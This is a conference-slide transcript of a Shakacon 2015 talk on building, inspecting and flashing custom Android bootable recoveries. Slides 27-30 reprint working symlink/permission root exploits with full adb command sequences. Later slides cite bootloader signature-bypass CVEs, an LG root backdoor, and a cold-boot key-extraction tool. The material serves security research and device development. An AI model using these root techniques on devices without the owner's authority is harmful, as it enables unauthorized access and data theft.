Android porting for dummies @droidconin 2011
Android porting for dummies @droidconin 2011Android porting for dummies @droidconin 2011
Android porting for dummies @droidconin 2011
 
hacking-embedded-devices.pptx
hacking-embedded-devices.pptxhacking-embedded-devices.pptx
hacking-embedded-devices.pptx
 

More from Shakacon

Web (dis)assembly
Web (dis)assemblyWeb (dis)assembly
Web (dis)assemblyShakacon
 
I can be apple and so can you
I can be apple and so can youI can be apple and so can you
I can be apple and so can youShakacon
 
Cloud forensics putting the bits back together
Cloud forensics putting the bits back togetherCloud forensics putting the bits back together
Cloud forensics putting the bits back togetherShakacon
 
Pwned in Translation - from Subtitles to RCE
Pwned in Translation - from Subtitles to RCEPwned in Translation - from Subtitles to RCE
Pwned in Translation - from Subtitles to RCEShakacon
 
Oversight: Exposing spies on macOS
Oversight: Exposing spies on macOS Oversight: Exposing spies on macOS
Oversight: Exposing spies on macOS Shakacon
 
Modern Reconnaissance Phase on APT - protection layer
Modern Reconnaissance Phase on APT - protection layerModern Reconnaissance Phase on APT - protection layer
Modern Reconnaissance Phase on APT - protection layerShakacon
 
A Decompiler for Blackhain-Based Smart Contracts Bytecode
A Decompiler for Blackhain-Based Smart Contracts BytecodeA Decompiler for Blackhain-Based Smart Contracts Bytecode
A Decompiler for Blackhain-Based Smart Contracts BytecodeShakacon
 
Honey, I Stole Your C2 Server: A Dive into Attacker Infrastructure
Honey, I Stole Your C2 Server: A Dive into Attacker InfrastructureHoney, I Stole Your C2 Server: A Dive into Attacker Infrastructure
Honey, I Stole Your C2 Server: A Dive into Attacker InfrastructureShakacon
 
Dock ir incident response in a containerized, immutable, continually deploy...
Dock ir incident response in a containerized, immutable, continually deploy...Dock ir incident response in a containerized, immutable, continually deploy...
Dock ir incident response in a containerized, immutable, continually deploy...Shakacon
 
Reviewing the Security of ASoC Drivers in Android Kernel
Reviewing the Security of ASoC Drivers in Android KernelReviewing the Security of ASoC Drivers in Android Kernel
Reviewing the Security of ASoC Drivers in Android KernelShakacon
 
Silent Protest: A Wearable Protest Network
Silent Protest: A Wearable Protest NetworkSilent Protest: A Wearable Protest Network
Silent Protest: A Wearable Protest NetworkShakacon
 
WiFi-Based IMSI Catcher
WiFi-Based IMSI CatcherWiFi-Based IMSI Catcher
WiFi-Based IMSI CatcherShakacon
 
Sad Panda Analysts: Devolving Malware
Sad Panda Analysts: Devolving MalwareSad Panda Analysts: Devolving Malware
Sad Panda Analysts: Devolving MalwareShakacon
 
reductio [ad absurdum]
reductio [ad absurdum]reductio [ad absurdum]
reductio [ad absurdum]Shakacon
 
XFLTReat: a new dimension in tunnelling
XFLTReat: a new dimension in tunnellingXFLTReat: a new dimension in tunnelling
XFLTReat: a new dimension in tunnellingShakacon
 
Windows Systems & Code Signing Protection by Paul Rascagneres
Windows Systems & Code Signing Protection by Paul RascagneresWindows Systems & Code Signing Protection by Paul Rascagneres
Windows Systems & Code Signing Protection by Paul RascagneresShakacon
 
When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...
When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...
When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...Shakacon
 
The Search for the Perfect Door - Deviant Ollam
The Search for the Perfect Door - Deviant OllamThe Search for the Perfect Door - Deviant Ollam
The Search for the Perfect Door - Deviant OllamShakacon
 

More from Shakacon (20)

Web (dis)assembly
Web (dis)assemblyWeb (dis)assembly
Web (dis)assembly
 
Macdoored
MacdooredMacdoored
Macdoored
 
I can be apple and so can you
I can be apple and so can youI can be apple and so can you
I can be apple and so can you
 
Cloud forensics putting the bits back together
Cloud forensics putting the bits back togetherCloud forensics putting the bits back together
Cloud forensics putting the bits back together
 
Pwned in Translation - from Subtitles to RCE
Pwned in Translation - from Subtitles to RCEPwned in Translation - from Subtitles to RCE
Pwned in Translation - from Subtitles to RCE
 
Oversight: Exposing spies on macOS
Oversight: Exposing spies on macOS Oversight: Exposing spies on macOS
Oversight: Exposing spies on macOS
 
Modern Reconnaissance Phase on APT - protection layer
Modern Reconnaissance Phase on APT - protection layerModern Reconnaissance Phase on APT - protection layer
Modern Reconnaissance Phase on APT - protection layer
 
Shamoon
ShamoonShamoon
Shamoon
 
A Decompiler for Blackhain-Based Smart Contracts Bytecode
A Decompiler for Blackhain-Based Smart Contracts BytecodeA Decompiler for Blackhain-Based Smart Contracts Bytecode
A Decompiler for Blackhain-Based Smart Contracts Bytecode
 
Honey, I Stole Your C2 Server: A Dive into Attacker Infrastructure
Honey, I Stole Your C2 Server: A Dive into Attacker InfrastructureHoney, I Stole Your C2 Server: A Dive into Attacker Infrastructure
Honey, I Stole Your C2 Server: A Dive into Attacker Infrastructure
 
Dock ir incident response in a containerized, immutable, continually deploy...
Dock ir incident response in a containerized, immutable, continually deploy...Dock ir incident response in a containerized, immutable, continually deploy...
Dock ir incident response in a containerized, immutable, continually deploy...
 
Reviewing the Security of ASoC Drivers in Android Kernel
Reviewing the Security of ASoC Drivers in Android KernelReviewing the Security of ASoC Drivers in Android Kernel
Reviewing the Security of ASoC Drivers in Android Kernel
 
Silent Protest: A Wearable Protest Network
Silent Protest: A Wearable Protest NetworkSilent Protest: A Wearable Protest Network
Silent Protest: A Wearable Protest Network
 
WiFi-Based IMSI Catcher
WiFi-Based IMSI CatcherWiFi-Based IMSI Catcher
WiFi-Based IMSI Catcher
 
Sad Panda Analysts: Devolving Malware
Sad Panda Analysts: Devolving MalwareSad Panda Analysts: Devolving Malware
Sad Panda Analysts: Devolving Malware
 
reductio [ad absurdum]
reductio [ad absurdum]reductio [ad absurdum]
reductio [ad absurdum]
 
XFLTReat: a new dimension in tunnelling
XFLTReat: a new dimension in tunnellingXFLTReat: a new dimension in tunnelling
XFLTReat: a new dimension in tunnelling
 
Windows Systems & Code Signing Protection by Paul Rascagneres
Windows Systems & Code Signing Protection by Paul RascagneresWindows Systems & Code Signing Protection by Paul Rascagneres
Windows Systems & Code Signing Protection by Paul Rascagneres
 
When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...
When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...
When Encryption is Not Enough...Sumanth Naropanth, Chandra Prakash Gopalaiah ...
 
The Search for the Perfect Door - Deviant Ollam
The Search for the Perfect Door - Deviant OllamThe Search for the Perfect Door - Deviant Ollam
The Search for the Perfect Door - Deviant Ollam
 

android recovery guide

  • 1. android recovery How To Make Android’s Bootable Recovery Work For You Drew Suarez SHAKACON 2015
  • 2. android recovery Nice to meet you, I’m Drew. • Security Consultant for Matasano/NCC Group • Focus in mobile security/research • Built Android firmware for dozens of devices • CyanogenMod Project / Wiki • “Cool guy” Internet handle: utkanos
  • 3. android recovery What’s this all about then? • Why do I need this? • Bootable recovery • Device mapping • Firmware inspection • Flashing your images
  • 4. android recovery What is Android recovery? • Stock recovery mode: minimal mode on Android devices that boots a Linux environment with tools to install/recover/ repair Android used primarily to install signed OTA updates and reset userdata/cache ADB (Android Debug Bridge) access (sometimes) very limited in scope/usefulness
  • 5. android recovery What is Android recovery? • Custom recoveries: provide root access / useful binaries allow for easy backup of essential firmware scriptable installation of custom Android firmware
  • 6. android recovery Why is this significant? • Custom recoveries provide a means to investigate, modify and test new firmware • Full control over device In many cases….
  • 7. android recovery Why do I need this? • Penetration testing • Forensics or data acquisition • Bypassing security controls • Useful for Android testing/development
  • 8. android recovery Got it… so how do I make one? • Map the device topology out in full • Get the kernel source (or prebuilt*) • Build Android device configuration
  • 11. android recovery A Unique Snowflake…
  • 12. android recovery Recovery: Parts and Structure • Typical Android boot image Android boot header Kernel (compiled zImage) Initial Ramdisk • Initramfs style image Kernel (contains initramfs ramdisk) Recovery binary/tools compiled directly into kernel
  • 13. android recovery Recovery: Parts and Structure • Combined boot/recovery image Boot image and recovery image share a ramdisk Share one partition
  • 14. android recovery Recovery: Initrd Images ** +-----------------+ ** | boot header | 1 page ** +-----------------+ ** | kernel | n pages ** +-----------------+ ** | ramdisk | m pages ** +-----------------+ ** | 2nd stage | o pages ** +-----------------+ Boot Header: 1) Magic (8B) 2) kernel size (4B) 3) kernel addr (4B) 4) ramdisk size (4B) 5) ramdisk addr (4B) 6) 2ndary size (4B) 7) 2ndary addr (4B) 8) tags addr (4B) 9) page size (4B) 10) * 11) * 12) product name (16B) 13) kernel cmdline (512B) 14) id (8B) * 10 and 11 of Boot Header used for DTB (device tree blob), unused otherwise
  • 15. android recovery Recovery: Parts and Structure • Initial ramdisk/ramfs Loads a temporary root filesystem into memory Files needed specifically for recovery mode operation init binary/scripts, binaries, images and firmware Can be rebuilt or modified to include more tools and features and extended functionality
  • 16. android recovery Recovery: Parts and Structure • recovery.fstab (<=Android 4.2.2): Maps block devices and their filesystems to mount points Resides typically in etc/ or res/ in ramdisk • fstab.(platform) (>=Android 4.3): Ex: fstab.qcom, fstab.msm8974 Slightly different mapping order
  • 18. android recovery Device Mapping • Stock firmware (boot or recovery) variety of sites/places to source OEM firmware to source pull from a rooted device (via dd) • Uses troubleshooting / recon device topology
  • 19. android recovery Device Mapping • Kernel source A must-have for initramfs style recoveries Useful for making smaller kernels for devices with limited recovery space Can be modified for your specific needs
  • 20. android recovery Device Mapping • /system/build.prop Contains parameters used for setting various different options in Android We want the device specific board codename information • /proc/emmc or /proc/mtd, /proc/partitions • /proc/config.gz and ikconfig
  • 21. android recovery Ok, where do I find all this stuff ?! Lets take apart some firmware.
  • 22. android recovery Standard Android boot image utkanos@leviathan /amnesiac/android/recovery/dlx $ od -c recovery.img |more 0000000 A N D R O I D ! 310 t S 0 0 200 ` 200 0000020 341 P ' 0 0 200 240 201 0 0 0 0 0 0 P 201 0000040 0 001 ` 200 0 b 0 0 0 0 0 0 0 0 0 0 0000060 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0000100 c o n s o l e = t t y H S L 0 , 0000120 1 1 5 2 0 0 , n 8 a n d r o i 0000140 d b o o t . h a r d w a r e = d 0000160 l x u s e r _ d e b u g = 3 1 0000200 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
  • 23. android recovery Firmware Exploration • unpackbootimg/mkboot [1] $> unpackbootimg -i firmware.img -o . $> zcat ramdisk.gz | cpio -id —- $> mkboot firmware.img outdir • unpack-initramfs.sh [2] • binwalk
  • 24. android recovery mkboot utkanos@leviathan ~/mkbootimg_tools $ ./mkboot /amnesiac/android/hlte/ recovery_hltetmo.img hltetmo_outdir Unpack & decompress /amnesiac/android/hlte/recovery_hltetmo.img to hltetmo_outdir kernel : zImage ramdisk : ramdisk page size : 2048 kernel size : 8281496 ramdisk size : 2987655 dtb size : 1316864 base : 0x00000000 kernel offset : 0x00008000 ramdisk offset : 0x02900000 second_offset : 0x00f00000 tags offset : 0x02700000 dtb img : dt.img cmd line : console=null androidboot.hardware=qcom user_debug=31 msm_rtb.filter=0x3F ramdisk is gzip format. Unpack completed.
  • 25. android recovery Firmware Exploration • Our goal is to get the ramdisk and a working prebuilt kernel (zImage) • The ramdisk contains init scripts, custom scripts and binaries we want • Very useful for finding flaws to exploit devices
  • 26. android recovery Why are init scripts so important? • Great source for bugs symlink attacks overly permissive permissions debug functionality • Contain services and their parameters helpful for making recovery run properly
  • 27. android recovery symlink/permissions tomfoolery Reprinted with kind permission from jcase. [3] # DRMv1 rights storage symlink /data/local /data/drm mkdir /data/local/rights 0777 shell shell chown shell shell /data/drm write /data/drm/rights/mid.txt 0000000000000000 chmod 0777 /data/drm/rights/mid.txt
  • 28. android recovery Reprinted with kind permission from jcase. [3] Retina:recovery jcase$ adb push root.sh /data/local/rights/ Retina:recovery jcase$ adb shell $ cd /data/local/rights $ ls -l -rw-rw-rw- shell shell 153 2014-07-23 20:15 root.sh -rwxrwxrwx root root 16 2014-07-23 20:13 mid.txt $ chmod 755 root.sh $ mv mid.txt mid.txt-backup $ ln -s /sys/kernel/uevent_helper mid.txt $ ls -l /sys/kernel/uevent_helper -rw-r--r-- root root 4096 2014-07-23 20:14 uevent_helper $ exit Retina:recovery jcase$ adb reboot Retina:recovery jcase$ adb shell $ ls -l /sys/kernel/uevent_helper -rwxrwxrwx root root 4096 2014-07-23 20:14 uevent_helper $ echo "/data/local/rights/root.sh" > /sys/kernel/uevent_helper $ cat /sys/kernel/uevent_helper /data/local/rights/root.sh $ su #
  • 29. android recovery symlink/permissions tomfoolery # cd /data/data # ls -l ... (snip) ... drwxr-xr-x app_0 app_0 2014-07-27 12:14 com.htc drwxrwxrwx root root 2014-07-27 12:13 recovery # ls -l -a -R recovery recovery: -rw-rw-rw- root root 383 2014-07-27 12:13 log Reprinted with kind permission from jcase. [3]
  • 30. android recovery Retina:recovery jcase$ adb shell $ cd /data/data/recovery $ ls -l -rw-rw-rw- root root 383 2014-07-27 12:13 log $ rm log $ ln -s /data/local.prop log $ exit Retina:recovery jcase$ adb reboot recovery Retina:recovery jcase$ adb shell $ ls -l /data/local.prop -rw-rw-rw- root root 3114 2014-07-27 17:11 local.prop $ echo 'ro.kernel.qemu=1' > /data/local.prop $ exit Retina:recovery jcase$ adb reboot Retina:recovery jcase$ adb shell # id uid=0(root) gid=0(root) Reprinted with kind permission from jcase. [3]
  • 31. android recovery What else in the ramdisk is interesting? • watchdog daemons • necessary kernel objects • stand alone binaries • special commands
  • 32. android recovery What if I can't figure something out? • If lacking firmware, attempt to look at the device by hand using adb shell • Use output of mount to identify key partitions • Look at sizes in /proc/partitions and make educated guesses for firmware locations
  • 34. android recovery Build a device config • Android build system Based on “meal ordering” concept Each device is a unique “combo meal” Combos can inherit from one another We need to build a new combo!
  • 35. android recovery Build a device config • CyanogenMod (or other) Android source [4] • Linux or OSX • All the info gathered earlier
  • 36. android recovery Build a device config • Utilize the mkvendor.sh script in the Android source mkvendor takes 3 parameters and builds a skeleton bare bones device config ex: $> mkvendor.sh samsung hltetmo recovery_hltetmo.img
  • 37. android recovery Build a device config • mkvendor output is almost always incomplete/wrong, fix it! BoardConfig.mk recovery.fstab/fstab.platform device_(codename).mk
  • 38. android recovery BoardConfig.mk • Contains essential information about your device’s board, CPU, various hardware and device specific oddities • Requires the most modification and is continuously evolving the further in the process you get • For the scope of this talk, only the bare necessities to build a recovery are covered
  • 39. android recovery BoardConfig.mk • BOARD_FORCE_RAMDISK_ADDRESS • BOARD_MKBOOT_ARGS use these to force a ramdisk offset especially important on large partitions former deprecated after Android 4.1
  • 40. android recovery device_(codename).mk • Contains instructions about what packages to build and where to copy specific files or properties during your build • Use this file to insert necessary or additional files into the ramdisk during compile time • Essential for including OEM specific oddities, specific binaries or scripts required for recovery operation
  • 41. android recovery Build it! • Use lunch to load in your new device combo $> source build/envsetup.sh $> lunch YOURDEVICE-eng $> make recoveryimage
  • 42. android recovery Flash it! • Once you’re ready to boot the recovery, use one of the following common methods based on your specific use case dd (requires root, see init portion of talk ) flash_image (mtd typically) ODIN/Heimdall (Samsung) fastboot (various OEMs) laf
  • 44. android recovery Download Mode (Samsung) • Download Mode is a Samsung specific boot loader interface shipped on all of their Android devices. It requires specific naming on images you wish to flash! • Internally, Samsung uses a tool called ODIN to interact with the device and flash firmware This is a Windows only, closed source application :(
  • 46. android recovery Download Mode • ODIN requires ustar formatted tar archives containing the firmware desired. Here’s how to make one: $> tar -H ustar -c recovery.img > recovery.tar $> md5sum -t recovery.tar >> recovery.tar $> mv recovery.tar recovery.tar.md5
  • 47. android recovery Download Mode (Samsung) • Heimdall is an open source, cross-platform tool created from reversing ODIN • Capable of writing raw images • More flexible and useful than ODIN
  • 48. android recovery Download Mode (Samsung) • Overly permissive! Most devices allow direct write access aside from a handful of US carrier protected models • Newer protections exist but are inconsistently applied
  • 49. android recovery fastboot mode • Found on Nexus, HTC, Sony and many other OEMs. • Great for testing an image without having to write it to local storage (fastboot boot) • Unlocking the bootloader to use fastboot most often but not always erases userdata partition!
  • 50. android recovery unless… • issues with lk (little kernel) boot loader used on many devices: “Fastboot boot command bypasses signature verification (CVE-2014-4325)” [5] “Incomplete signature parsing during boot image authentication leads to signature forgery (CVE-2014-0973)” [6] “Improper partitions bounds checking when flashing sparse images (CVE-2015-0567)” [7] • Download mode • laf • Numerous other exploits…
  • 51. android recovery LG’s laf/download • Bootable partition named la found on many LG devices (including the Nexus 5(!)) • Communication via Send_Command binary (Windows) ported to other platforms via python • Root shell (backdoor)
  • 53. android recovery FROST / forensics [9] • Forensic Recovery Of Scrambled Telephones is a custom recovery (based on ClockworkMod) for retrieval of encryption keys, PIN codes and content stored in RAM “Cold boot” attack (uses actual freezer to slow down the degradation of RAM content) Rate of decay drops enough to be useful around 10 °C • Uses aeskeyfind ‘live’ or via memory dump on PC to search for AES keys
  • 54. android recovery New Protections… • init contexts • Protections like Knox/Secure Boot on more and more models • TrustZone wrapping of device key • Increased SELinux presence and system protections like blocking view into /dev
  • 55. android recovery Getting started • Github is your friend! • Many sites host stock firmware for Android devices samfirmware.com xda-developers.com forums
  • 56. android recovery Getting started • Setting up your build environment: CyanogenMod wiki has a step by step walkthrough and additional resources for development and hacking • Review links in the references section • Stay up on Android security via droidsec
  • 57. android recovery References [1] https://github.com/CyanogenMod/android_system_core/tree/cm-11.0/mkbootimg [2] https://github.com/xiaolu/mkbootimg_tools [3] From material Copyright 2014 Jon Sawyer - Applied Cybersecurity LLC used with kind permission [4] https://github.com/CyanogenMod/ , https://github.com/CyanogenMod/android_bootable_recovery , https://github.com/TeamWin/Team-Win-Recovery-Project [5] https://www.codeaurora.org/projects/security-advisories/fastboot-boot-command-bypasses- signature-verification-cve-2014-4325 [6] https://www.codeaurora.org/projects/security-advisories/incomplete-signature-parsing-during-boot- image-authentication-leads-to-signature-forgery-cve-2014-0973 [7] https://www.codeaurora.org/projects/security-advisories/lk-improper-partition-bounds-checking- when-flashing-sparse-images-cve [8] Courtesy of Fuzion24 (@Fuzion24) [9] https://www1.informatik.uni-erlangen.de/frost
  • 58. android recovery Thank you! Questions? Drew Suarez // matasano security @utkan0s on twitter https://github.com/utkanos utkanos on freenode (#droidsec) utkanos at gmail dot com